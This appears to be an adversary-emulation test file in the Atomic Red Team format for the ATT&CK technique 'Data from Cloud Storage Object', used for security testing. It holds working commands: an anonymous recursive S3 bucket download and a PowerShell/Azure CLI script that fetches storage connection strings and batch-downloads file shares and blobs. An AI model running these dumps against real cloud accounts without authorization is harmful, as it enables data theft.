attack_technique: T1530 display_name: Data from Cloud Storage Object atomic_tests: - name: AWS - Scan for Anonymous Access to S3 auto_generated_guid: 979356b9-b588-4e49-bba4-c35517c484f5 description: | Upon successful execution, this test will test for anonymous access to AWS S3 buckets and dumps all the files to a local folder. supported_platforms: - iaas:aws input_arguments: s3_bucket_name: description: Name of the bucket type: string default: "redatomic-test2" dependencies: - description: | Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | cat ~/.aws/credentials | grep "default" aws s3api create-bucket --bucket #{s3_bucket_name} aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1530/src/policy.json touch /tmp/T1530.txt aws s3 cp /tmp/T1530.txt s3://#{s3_bucket_name} get_prereq_command: | echo Please install the aws-cli and configure your AWS default profile using: aws configure executor: command: | aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name} cleanup_command: | aws s3 rb s3://#{s3_bucket_name} --force rm -rf /tmp/#{s3_bucket_name} name: sh elevation_required: false - name: Azure - Dump Azure Storage Account Objects via Azure CLI auto_generated_guid: 67374845-b4c8-4204-adcc-9b217b65d4f1 description: |- This test dumps the content of the storage account objects present in the file defined in file_shares_csv_file_path. Note that this file is created in the atomic test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". When created manually, it must contain the columns "ResourceGroup","StorageAccountName", "FileShareName", "ContainerName", "BlobName". Requirements: - The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required. - The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions. supported_platforms: - iaas:azure input_arguments: output_folder: type: path default: $env:temp\T1530_storage_account_objects description: Folder path to output file share content to storage_account_objects_csv_file_path: type: path default: $env:temp\T1619_storage_account_objects.csv description: Path to file that contains all storage account objects in form of a csv file. This may be the result from Test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". dependency_executor_name: powershell dependencies: - description: Azure CLI must be installed prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} get_prereq_command: Install-Module -Name Az -Force executor: command: |- $storage_account_objects = Import-Csv -Path "#{storage_account_objects_csv_file_path}" # Login to Azure az login if (-not (Test-Path -Path "#{output_folder}")) { New-Item -ItemType Directory -Path "#{output_folder}" } foreach ($row in $storage_account_objects) { if ($row.FileShareName -ne ""){ $allowSharedKeyAccess = az storage account show --name $row.StorageAccountName --resource-group $row.ResourceGroup --query "allowSharedKeyAccess" if ($allowSharedKeyAccess -eq "false") { # $allowSharedKeyAccess could be true or null Write-Output "Shared key access is disabled for this storage account." } else { Write-Output "Fetching content from file share: $($row.FileShareName) in storage account $($row.StorageAccountName) ..." $connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv # Create folder for storage account objects $storageAccountOutputPath = Join-Path #{output_folder} "$($row.ResourceGroup)_$($row.StorageAccountName)" if (-not (Test-Path -Path $storageAccountOutputPath)) { New-Item -ItemType Directory -Path $storageAccountOutputPath } # create folder for file share content $fileSharePath = Join-Path -Path $storageAccountOutputPath $row.FileShareName if (-not (Test-Path -Path $fileSharePath)) { New-Item -ItemType Directory -Path $fileSharePath } az storage file download-batch --connection-string $connectionString --source $row.FileShareName --destination $fileSharePath } } elseif ($row.ContainerName -ne "" -and $row.BlobName -eq "") { $allowSharedKeyAccess = az storage account show --name $row.StorageAccountName --resource-group $row.ResourceGroup --query "allowSharedKeyAccess" if ($allowSharedKeyAccess -eq "false") { # $allowSharedKeyAccess could be true or null Write-Output "Shared key access is disabled for this storage account." } else { Write-Output "Fetching all blobs from container $($row.ContainerName) in storage account $($row.StorageAccountName) ..." $connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv # Create folder for storage account objects $storageAccountOutputPath = Join-Path #{output_folder} "$($row.ResourceGroup)_$($row.StorageAccountName)" if (-not (Test-Path -Path $storageAccountOutputPath)) { New-Item -ItemType Directory -Path $storageAccountOutputPath } # create folder for blob content $containerFolderPath = Join-Path $storageAccountOutputPath $row.ContainerName if (-not (Test-Path -Path $containerFolderPath)) { New-Item -ItemType Directory -Path $containerFolderPath } az storage blob download-batch --destination $containerFolderPath --source $row.ContainerName --connection-string $connectionString } } } cleanup_command: |- Remove-Item -Path "#{output_folder}" -Recurse -Force -erroraction silentlycontinue Write-Output "Removed #{output_folder}" name: powershell elevation_required: false